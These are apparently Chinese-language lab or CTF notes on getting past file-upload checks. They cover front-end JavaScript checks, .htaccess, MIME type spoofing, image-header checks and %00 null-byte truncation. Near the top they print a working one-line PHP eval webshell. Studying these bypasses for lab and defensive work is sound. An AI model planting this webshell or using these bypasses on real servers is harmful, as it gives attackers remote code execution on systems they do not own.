无验证
这个直接写PHP上传就行了,不用抓包,一句话木马
<?php @eval($_POST["mimi"]);?>
//注意POST大写,小写试过了连接不上
js前端验证
.htaccess
先写一个 .htaccess文件
MIME验证
抓包后修改文件连接类型
文件头检查
找一个图片完整的图片,只添加文件头不行,下面写上一句话木马
抓包修改文件后缀名
00截断
1、 %00截断 GET 用法
当是GET接收情况的时候,直接用 %00 就可以了。
如果做了后缀名判断的情况下,那样是会直接报错,不让你上传,因为你的后缀是 .jpg,不是 .php;
2、%00截断 POST 用法
当是POST接收情况的时候,正确的用法应该是我们需要对 %00 做一个URL解码,也就是URL-decode;
阿帕奇服务器是从左往右读取文件后缀
为什么两者用法不同?
这是因为 %00 截断在 GET 中被 url 解码之后是空字符。但是在 POST 中 %00 不会被 url 解码,所以只能通过 burpsuite 修改 hex 值为 00 (URL decode)进行截断。
下面是源码
抓包修改路径
结束